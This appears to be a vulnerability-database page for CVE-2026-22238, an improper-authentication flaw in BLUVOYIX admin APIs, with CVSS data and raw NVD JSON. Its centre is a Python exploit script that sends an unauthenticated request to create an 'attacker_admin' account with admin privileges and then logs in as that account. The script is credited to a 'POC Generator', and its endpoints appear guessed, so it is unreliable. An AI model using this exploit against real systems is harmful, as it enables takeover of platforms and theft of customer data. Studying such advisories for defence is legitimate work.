Security Vulnerability Report
CVE-2026-22238 CVSS 9.8 CRITICAL

CVE-2026-22238

Published: 2026-01-14 15:16:05
Last Modified: 2026-02-02 15:51:25
Source: 56a186b1-7f5e-4314-ba38-38d5499fccfd

Description

The vulnerability exists in BLUVOYIX due to improper authentication in the BLUVOYIX admin APIs. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable admin API to create a new user with admin privileges. Successful exploitation of this vulnerability could allow the attacker to gain full access to customers' data and completely compromise the targeted platform by logging in to the newly-created admin user.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:blusparkglobal:bluvoyix:-:*:*:*:*:*:*:* - VULNERABLE
BLUVOYIX < unknown fixed version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-22238 PoC - BLUVOYIX Admin API Unauthorized User Creation
# Target: BLUVOYIX platform with vulnerable admin API
# Author: POC Generator

TARGET_URL = "http://target-server.com"
API_ENDPOINT = f"{TARGET_URL}/api/admin/users"


def create_admin_user():
    """
    Exploit: Create admin user via unprotected admin API
    This PoC demonstrates the authentication bypass in BLUVOYIX admin APIs
    """
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    }

    # Malicious payload to create admin user
    payload = {
        "username": "attacker_admin",
        "password": "P@ssw0rd123!",
        "email": "[email protected]",
        "role": "admin",
        "privileges": ["read", "write", "delete", "admin"],
    }

    try:
        # Send unauthorized request to create admin user
        response = requests.post(API_ENDPOINT, json=payload, headers=headers, timeout=10)
        if response.status_code in (200, 201):
            print("[+] SUCCESS: Admin user created!")
            print("[+] Username: attacker_admin")
            print("[+] Password: P@ssw0rd123!")

            # Login with created credentials
            login_endpoint = f"{TARGET_URL}/api/auth/login"
            login_data = {"username": "attacker_admin", "password": "P@ssw0rd123!"}
            login_resp = requests.post(login_endpoint, json=login_data, headers=headers, timeout=10)
            if login_resp.status_code == 200:
                print("[+] SUCCESS: Full admin access obtained!")
                return True
        else:
            print(f"[-] FAILED: Status code {response.status_code}")
            print(f"[-] Response: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[-] ERROR: {e}")
    return False


if __name__ == "__main__":
    print("=" * 50)
    print("CVE-2026-22238 PoC - BLUVOYIX Unauthorized Admin Creation")
    print("=" * 50)
    create_admin_user()

References

https://blusparkglobal.com/bluvoyix/ (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22238", "sourceIdentifier": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "published": "2026-01-14T15:16:05.090", "lastModified": "2026-02-02T15:51:24.527", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability exists in BLUVOYIX due to improper authentication in the BLUVOYIX admin APIs. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable admin API to create a new user with admin privileges. Successful exploitation of this vulnerability could allow the attacker to gain full access to customers' data and completely compromise the targeted platform by logging in to the newly-created admin user."}, {"lang": "es", "value": "La vulnerabilidad existe en BLUVOYIX debido a una autenticación incorrecta en las API de administración de BLUVOYIX. Un atacante remoto no autenticado podría explotar esta vulnerabilidad enviando solicitudes HTTP especialmente diseñadas a la API de administración vulnerable para crear un nuevo usuario con privilegios de administrador. 
La explotación exitosa de esta vulnerabilidad podría permitir al atacante obtener acceso total a los datos de los clientes y comprometer completamente la plataforma objetivo iniciando sesión con el usuario administrador recién creado."}], "metrics": {"cvssMetricV40": [{"source": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:H/U:Red", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "HIGH", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, 
"baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}, {"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:blusparkglobal:bluvoyix:-:*:*:*:*:*:*:*", "matchCriteriaId": "84FDD5FA-DB87-4263-A7F2-C136D7F4155C"}]}]}], "references": [{"url": "https://blusparkglobal.com/bluvoyix/", "source": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "tags": ["Product"]}]}}